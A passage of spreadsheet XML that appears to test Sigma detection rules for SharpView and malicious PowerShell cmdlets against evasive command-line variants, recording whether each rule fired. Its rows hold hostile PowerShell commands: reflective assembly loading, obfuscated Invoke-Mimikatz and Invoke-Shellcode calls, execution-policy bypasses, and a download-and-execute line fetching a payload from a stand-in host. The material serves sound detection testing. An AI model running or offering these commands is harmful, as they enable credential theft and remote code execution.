          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E903" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H903" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I903" s="43" t="n"/>
      <c r="J903" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K903" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="904" ht="15.75" customHeight="1" s="42">
      <c r="A904" s="43" t="n"/>
      <c r="B904" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C904" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D904" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E904" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F904" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G904" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H904" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I904" s="43" t="n"/>
      <c r="J904" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K904" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="905" ht="15.75" customHeight="1" s="42">
      <c r="A905" s="43" t="n"/>
      <c r="B905" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C905" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D905" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E905" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F905" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G905" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H905" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I905" s="36" t="n"/>
      <c r="J905" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K905" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="906" ht="15.75" customHeight="1" s="42">
      <c r="A906" s="43" t="n"/>
      <c r="B906" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C906" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D906" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E906" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F906" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G906" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H906" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I906" s="36" t="n"/>
      <c r="J906" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K906" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="907" ht="15.75" customHeight="1" s="42">
      <c r="A907" s="43" t="n"/>
      <c r="B907" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C907" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D907" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E907" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F907" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G907" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H907" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I907" s="43" t="n"/>
      <c r="J907" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K907" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="908" ht="15.75" customHeight="1" s="42">
      <c r="A908" s="43" t="n"/>
      <c r="B908" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C908" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D908" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E908" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F908" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G908" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H908" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I908" s="36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908" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K908" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="909" ht="15.75" customHeight="1" s="42">
      <c r="A909" s="43" t="n"/>
      <c r="B909" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C909" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D909" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E909" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOprOFILe -ep Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F909" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G909" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H909" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I909" s="36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909" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K909" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="910" ht="15.75" customHeight="1" s="42">
      <c r="A910" s="43" t="n"/>
      <c r="B910" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C910" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D910" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E910" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ep Bypass -CommaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G910" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H910" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I910" s="36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910" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K910" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="911" ht="15.75" customHeight="1" s="42">
      <c r="A911" s="43" t="n"/>
      <c r="B911" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C911" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D911" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E911" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H911" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I911" s="43" t="n"/>
      <c r="J911" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K911" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="912" ht="15.75" customHeight="1" s="42">
      <c r="A912" s="43" t="n"/>
      <c r="B912" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C912" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D912" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E912" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H912" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I912" s="43" t="n"/>
      <c r="J912" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K912" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="913" ht="15.75" customHeight="1" s="42">
      <c r="A913" s="43" t="n"/>
      <c r="B913" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C913" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D913" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E913" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H913" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I913" s="43" t="n"/>
      <c r="J913" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K913" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="914" ht="15.75" customHeight="1" s="42">
      <c r="A914" s="43" t="n"/>
      <c r="B914" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C914" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D914" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E914" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F914" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G914" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H914" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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914" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K914" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="915" ht="15.75" customHeight="1" s="42">
      <c r="A915" s="43" t="n"/>
      <c r="B915" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C915" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D915" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E915" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F915" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G915" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H915" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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915" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K915" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="916" ht="15.75" customHeight="1" s="42">
      <c r="A916" s="43" t="n"/>
      <c r="B916" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C916" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D916" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E916" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F916" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G916" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H916" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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916" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K916" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="917" ht="15.75" customHeight="1" s="42">
      <c r="A917" s="43" t="n"/>
      <c r="B917" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C917" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D917" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E917" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F917" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G917" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H917" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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917" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K917" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="918" ht="15.75" customHeight="1" s="42">
      <c r="A918" s="43" t="n"/>
      <c r="B918" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C918" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D918" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E918" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F918" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G918" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H918" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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918" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K918" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="919" ht="15.75" customHeight="1" s="42">
      <c r="A919" s="43" t="n"/>
      <c r="B919" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C919" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D919" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E919" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F919" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G919" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H919" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91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919" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K919" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="920" ht="15.75" customHeight="1" s="42">
      <c r="A920" s="43" t="n"/>
      <c r="B920" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C920" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D920" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E920" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F920" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G920" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H920" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I92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920" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K920" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="921" ht="15.75" customHeight="1" s="42">
      <c r="A921" s="43" t="n"/>
      <c r="B921" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C921" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D921" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E921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921" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G921" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H921" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I921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921" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K921" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="922" ht="15.75" customHeight="1" s="42">
      <c r="A922" s="43" t="n"/>
      <c r="B922" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C922" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D922" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E922" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G922" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H922" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I922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922" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K922" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="923" ht="15.75" customHeight="1" s="42">
      <c r="A923" s="43" t="n"/>
      <c r="B923" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C923" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D923" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E923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923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H923" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I923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923" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K923" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="924" ht="15.75" customHeight="1" s="42">
      <c r="A924" s="43" t="n"/>
      <c r="B924" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C924" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D924" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E924" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H924" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I924" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J924" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K924" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="925" ht="15.75" customHeight="1" s="42">
      <c r="A925" s="43" t="n"/>
      <c r="B925" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C925" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D925" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E925" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H925" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I925" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J925" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K925" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="926" ht="15.75" customHeight="1" s="42">
      <c r="A926" s="43" t="n"/>
      <c r="B926" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C926" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D926" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E926" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F926" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G926" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H926" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I926" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J926" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K926" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="927" ht="15.75" customHeight="1" s="42">
      <c r="A927" s="43" t="n"/>
      <c r="B927" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C927" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D927" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E927" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H927" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I927" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J927" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K927" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="928" ht="15.75" customHeight="1" s="42">
      <c r="A928" s="43" t="n"/>
      <c r="B928" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C928" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D928" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E928" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H928" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I928" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J928" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K928" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="929" ht="15.75" customHeight="1" s="42">
      <c r="A929" s="43" t="n"/>
      <c r="B929" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C929" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D929" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E929" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H929" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I929" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J929" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K929" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="930" ht="15.75" customHeight="1" s="42">
      <c r="A930" s="43" t="n"/>
      <c r="B930" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C930" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D930" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E930" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F930" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G930" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H930" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I930" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J930" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K930" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="931" ht="15.75" customHeight="1" s="42">
      <c r="A931" s="43" t="n"/>
      <c r="B931" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C931" s="36" t="inlineStr">
        <is>
